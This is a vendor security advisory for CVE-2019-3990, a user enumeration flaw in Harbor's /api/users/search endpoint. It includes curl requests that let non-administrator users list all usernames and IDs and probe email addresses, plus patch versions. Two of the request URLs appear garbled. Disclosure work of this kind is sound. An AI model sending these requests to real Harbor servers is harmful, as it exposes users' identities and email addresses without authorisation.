User Enumeration Vulnerability (CVE-2019-3990)
Nick Manfredi of Tenable Research has discovered a User Enumeration flaw in Harbor. The issue is present in the "/users" api endpoint. This endpoint is supposed to be restricted to administrators. This restriction is able to be bypassed and information can be obtained via the "search" functionality.
Non-administrator users (such as those created via self-registration) can list all usernames and user IDs by sending a GET request to /api/users/search with no parameters, as follows:
curl -X GET "http://<host>/api/users/search" -H "accept: application/json" --user <user>:<password>
Using the email filter allows a non-administrator user to confirm the email address associated with a username, as follows:
curl -X GET "http://<host>/firstname.lastname@example.org" -H "accept: application/json" --user <user>:<password>
This filter may also be used to determine information about a user's email, as all users matching any part of the email parameter will be returned:
curl -X GET "http://<host>/email@example.com" -H "accept: application/json" --user <user>:<password>
For example, the above request will return all users who signed up with an "@test.com" email address.
The vulnerability was immediately fixed by the Harbor team and all supported versions were patched. With the patched versions of Harbor, the username is required for search and we have removed the support for querying by email.
Known Attack Vectors
Successful exploitation of this issue will lead to knowledge of all email addresses and user identifiers.
If your product uses the affected releases of Harbor, update to version 1.8.6 and 1.9.3 to patch this issue immediately.
There is no workaround for this issue
For more information
If you have any questions or comments about this advisory, contact firstname.lastname@example.org
View our security policy at https://github.com/goharbor/harbor/security/policy